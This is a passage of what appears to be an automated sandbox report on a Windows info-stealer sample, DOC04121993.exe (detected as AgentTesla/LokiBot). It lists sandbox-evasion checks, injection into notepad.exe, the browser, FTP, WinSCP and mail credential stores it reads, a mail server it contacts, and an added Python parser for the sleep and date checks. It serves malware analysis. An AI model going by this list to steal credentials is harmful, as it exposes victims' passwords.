                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 7_2_0046D412 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 7_2_0046D4D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\DOC04121993.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 2_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 2_2_00468746 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 2_2_0046BD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 2_2_00469BB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 7_2_0046BD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 7_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Code function: 7_2_00469BB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exe Memory protected: page read and write | page guard
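Two of the evasion indicators in this section deserve a closer look than the raw event list gives them: the thread sleep values (the sandbox flags anything at or beyond its 30000 limit, and the first value, 922337203685477, is exactly .NET's TimeSpan.MaxValue expressed in milliseconds, i.e. a sleep that never returns on its own), and the GetSystemTime check, where 07e4h is 2020 and the WORD at [esp] is the first field of a SYSTEMTIME, wYear. The script below is an added example, not code from the sandbox or from the sample: it parses lines copied from this report, classifies the sleeps, and decodes the cmp/jnc pair into "branch taken when wYear >= 2020". The assumption that the SYSTEMTIME buffer starts at [esp] follows from the sandbox's own "GetSystemTime followed by cmp" heuristic and is marked as such in the code; all helper names are mine.

```python
"""Added example (not sandbox or sample code): quantify the time-based evasion
indicators listed in this report section. Sample lines are copied from the
report; helper names and the [esp] assumption are stated inline."""
import re
import struct

# .NET TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10000 ticks per ms.
# The report's "Thread delayed: delay time: 922337203685477" is exactly this value.
DOTNET_TIMESPAN_MAX_MS = (2**63 - 1) // 10_000

SLEEP_RE = re.compile(r"TID: (?P<tid>\d+)\s*Thread sleep time: -(?P<value>\d+)s >= -(?P<limit>\d+)s")
COUNT_RE = re.compile(r"TID: (?P<tid>\d+)\s*Thread sleep count: (?P<count>\d+) > (?P<limit>\d+)")

# Copied from the report above, trimmed after the process path.
SAMPLE_LINES = [
    "DOC04121993.exe TID: 1064Thread sleep time: -922337203685477s >= -30000s",
    "DOC04121993.exe TID: 1064Thread sleep time: -30000s >= -30000s",
    "DOC04121993.exe TID: 1064Thread sleep time: -119564s >= -30000s",
    "DOC04121993.exe TID: 1064Thread sleep time: -59594s >= -30000s",
    "DOC04121993.exe TID: 5696Thread sleep count: 79 > 30",
]


def summarize_sleeps(lines):
    """Bucket sleep events: the infinite sentinel, long sleeps (>= the report's limit),
    and tight sleep loops. Units are whatever the report prints (the sandbox compares
    against 30000, the usual 30 s sleep-skipping threshold)."""
    out = {"infinite": 0, "long": 0, "total_finite": 0, "loops": []}
    for line in lines:
        if m := SLEEP_RE.search(line):
            value, limit = int(m["value"]), int(m["limit"])
            if value >= DOTNET_TIMESPAN_MAX_MS:
                out["infinite"] += 1          # Thread.Sleep(TimeSpan.MaxValue): parks the thread for good
            elif value >= limit:
                out["long"] += 1
                out["total_finite"] += value
        elif m := COUNT_RE.search(line):
            out["loops"].append((int(m["tid"]), int(m["count"])))
    return out


# SYSTEMTIME is eight little-endian WORDs in this order (winbase.h).
SYSTEMTIME_FIELDS = ("wYear", "wMonth", "wDayOfWeek", "wDay",
                     "wHour", "wMinute", "wSecond", "wMilliseconds")
CMP_RE = re.compile(r"cmp word ptr \[esp(?:\+(?P<off>[0-9a-f]+)h?)?\], (?P<imm>[0-9a-f]+)h and CTI: (?P<jcc>j\w+)")
# After `cmp lhs, imm` the carry flag is the unsigned borrow: jnc/jae/jnb fire when lhs >= imm, jc/jb when lhs < imm.
JCC_TAKEN_WHEN = {"jnc": ">=", "jae": ">=", "jnb": ">=", "jc": "<", "jb": "<"}

REPORT_CMP = "0_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h"


def decode_systemtime_check(text):
    """Map the report's cmp/jcc pair to (SYSTEMTIME field, decimal immediate, branch condition).
    Assumption: the SYSTEMTIME buffer handed to GetSystemTime starts at [esp], which is what
    the sandbox heuristic "GetSystemTime followed by cmp" implies."""
    m = CMP_RE.search(text)
    if not m:
        return None
    off = int(m["off"], 16) if m["off"] else 0
    imm = int(m["imm"], 16)
    return SYSTEMTIME_FIELDS[off // 2], imm, JCC_TAKEN_WHEN[m["jcc"].lower()]


def branch_taken(systemtime_bytes, imm=0x7E4, off=0):
    """Emulate `cmp word ptr [esp+off], imm ; jnc` on a raw SYSTEMTIME buffer."""
    word = struct.unpack_from("<H", systemtime_bytes, off)[0]
    return word >= imm


def make_systemtime(year, month=1, day=1):
    """Constructed SYSTEMTIME buffer (wDayOfWeek and the time fields zeroed)."""
    return struct.pack("<8H", year, month, 0, day, 0, 0, 0, 0)


if __name__ == "__main__":
    print(summarize_sleeps(SAMPLE_LINES))
    print(decode_systemtime_check(REPORT_CMP))
    for y in (2019, 2020, 2021):
        print(y, "jnc taken" if branch_taken(make_systemtime(y)) else "falls through")
```

The report does not say which side of the jnc is the live path, so the decoder only states the condition; whether years before 2020 are the "do not run" branch or the "run" branch has to be confirmed in the disassembly at 00470848. The TimeSpan.MaxValue sleep is worth treating as its own indicator: a sandbox that fakes sleep completion will let the sample proceed, a real host never will, which is the opposite of the usual sleep-to-outlast-the-sandbox pattern.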

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: A30000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: A40000 protect: page read and write
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 3F0000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 600000 protect: page read and write
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeSection loaded: unknown target: C:\Users\user\Desktop\DOC04121993.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\DOC04121993.exeSection loaded: unknown target: C:\Users\user\Desktop\DOC04121993.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\DOC04121993.exe | Thread APC queued: target process: C:\Windows\SysWOW64\notepad.exe
Writes to foreign memory regions
Source: C:\Users\user\Desktop\DOC04121993.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: A30000
Source: C:\Users\user\Desktop\DOC04121993.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: A40000
Source: C:\Users\user\Desktop\DOC04121993.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 3F0000
Source: C:\Users\user\Desktop\DOC04121993.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 600000
Source: C:\Users\user\Desktop\DOC04121993.exe | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
Source: C:\Users\user\Desktop\DOC04121993.exe | Process created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
Source: DOC04121993.exe, 00000002.00000002.464199660.0000000000E30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: DOC04121993.exe, 00000002.00000002.464199660.0000000000E30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: DOC04121993.exe, 00000002.00000002.464199660.0000000000E30000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: DOC04121993.exe, 00000002.00000002.464199660.0000000000E30000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
Source: C:\Users\user\Desktop\DOC04121993.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\DOC04121993.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00470848 GetSystemTime,ExitProcess,73BBB110,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 2_2_0233A502 GetUserNameW,
Source: C:\Users\user\Desktop\DOC04121993.exe | Code function: 0_2_00447320 GetVersion,
Source: C:\Users\user\Desktop\DOC04121993.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: DOC04121993.exe, 00000000.00000002.198459774.000000000019D000.00000004.00000010.sdmp | Binary or memory string: avp.exe

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.464088936.00000000009E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.464255746.0000000002242000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.224265072.0000000002150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.199649349.0000000002692000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.464010082.0000000000980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.224575545.0000000002292000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000001.223334796.0000000000499000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.224389648.00000000021B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.462860776.0000000000475000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.467418503.00000000029D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 1000, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 2576, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 5080, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 1956, type: MEMORY
Source: Yara match | File source: 7.2.DOC04121993.exe.2290000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.2240000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.DOC04121993.exe.2150000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.980000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.DOC04121993.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.1.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.DOC04121993.exe.2750000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.DOC04121993.exe.2150000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DOC04121993.exe.2690000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.9e0000.2.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\DOC04121993.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\DOC04121993.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\DOC04121993.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\DOC04121993.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\DOC04121993.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\DOC04121993.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\DOC04121993.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\DOC04121993.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\DOC04121993.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 1000, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.464088936.00000000009E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.464255746.0000000002242000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.224265072.0000000002150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.199649349.0000000002692000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.464010082.0000000000980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.224575545.0000000002292000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000001.223334796.0000000000499000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.224389648.00000000021B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.462860776.0000000000475000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.467418503.00000000029D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 1000, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 2576, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 5080, type: MEMORY
Source: Yara match | File source: Process Memory Space: DOC04121993.exe PID: 1956, type: MEMORY
Source: Yara match | File source: 7.2.DOC04121993.exe.2290000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.2240000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.DOC04121993.exe.2150000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.980000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.DOC04121993.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.1.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.DOC04121993.exe.2750000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.DOC04121993.exe.2150000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.980000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DOC04121993.exe.2690000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.DOC04121993.exe.9e0000.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Startup Items 1 | Startup Items 1 | Disable or Modify Tools 1 | OS Credential Dumping 2 | System Time Discovery 11 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 111 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 11 | Input Capture 21 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Native API 1 | Registry Run Keys / Startup Folder 2 | Access Token Manipulation 1 | Scripting 111 | Credentials in Registry 1 | File and Directory Discovery 3 | SMB/Windows Admin Shares | Screen Capture 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection 412 | Obfuscated Files or Information 2 | NTDS | System Information Discovery 128 | Distributed Component Object Model | Email Collection 1 | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder 2 | Software Packing 41 | LSA Secrets | Query Registry 1 | SSH | Input Capture 21 | Data Transfer Size Limits | Application Layer Protocol 11 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Security Software Discovery 271 | VNC | Clipboard Data 2 | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 15 | DCSync | Virtualization/Sandbox Evasion 15 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 412 | /etc/passwd and /etc/shadow | Application Window Discovery 11 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop

Behavior Graph

Behavior Graph ID: 321396 | Sample: DOC04121993.exe | Startdate: 21/11/2020 | Architecture: WINDOWS | Score: 100

Graph nodes and edges (numbers are graph node ids, not PIDs):
Start node signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; 4 other signatures
Start -> DOC04121993.exe (node 7) started
Start -> wscript.exe (node 10) started
Node 7 (DOC04121993.exe) signatures: Detected unpacking (changes PE section rights); Detected unpacking (creates a PE file in dynamic memory); Detected unpacking (overwrites its own PE header); 7 other signatures
Node 7 -> DOC04121993.exe (node 12) started
Node 7 -> notepad.exe (node 16) started
Node 7 -> DOC04121993.exe (node 18) started
Node 10 (wscript.exe) -> DOC04121993.exe (node 20) started
Node 12 -> hybridgroupco.com 66.70.204.222, 49731, 587 OVHFR Canada (node 31)
Node 12 -> mail.hybridgroupco.com (node 33)
Node 12 signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
Node 16 (notepad.exe) signatures: Drops VBS files to the startup folder; Delayed program exit found
Node 20 signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Maps a DLL or memory area into another process
Node 20 -> notepad.exe (node 22) started
Node 20 -> DOC04121993.exe (node 25) started
Node 20 -> DOC04121993.exe (node 27) started
Node 22 (notepad.exe) dropped: C:\Users\user\AppData\Roaming\...\STARTUP.vbs, ASCII (node 29)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
DOC04121993.exe | 69% | Virustotal |
DOC04121993.exe | 81% | ReversingLabs | Win32.Trojan.LokiBot
DOC04121993.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
7.1.DOC04121993.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.DOC04121993.exe.2240000.3.unpack | 100% | Avira | TR/Spy.Gen8
3.2.DOC04121993.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
7.2.DOC04121993.exe.21b0000.2.unpack | 100% | Avira | HEUR/AGEN.1138205
7.2.DOC04121993.exe.2290000.3.unpack | 100% | Avira | TR/Spy.Gen8
0.2.DOC04121993.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
5.2.DOC04121993.exe.2750000.3.unpack | 100% | Avira | TR/Spy.Gen8
0.2.DOC04121993.exe.2690000.3.unpack | 100% | Avira | HEUR/AGEN.1138205
5.2.DOC04121993.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
0.2.DOC04121993.exe.22e0000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.1.DOC04121993.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.DOC04121993.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
2.2.DOC04121993.exe.9e0000.2.unpack | 100% | Avira | HEUR/AGEN.1138205
7.2.DOC04121993.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

Domains

Source | Detection | Scanner | Label
hybridgroupco.com | 0% | Virustotal |
mail.hybridgroupco.com | 10% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://127.0.0.1: | 0% | Virustotal |
http://127.0.0.1: | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/ | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/ | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/ | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/ | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U | 0% | URL Reputation | safe
http://vd2JBRKVM6n.net | 0% | Avira URL Cloud | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
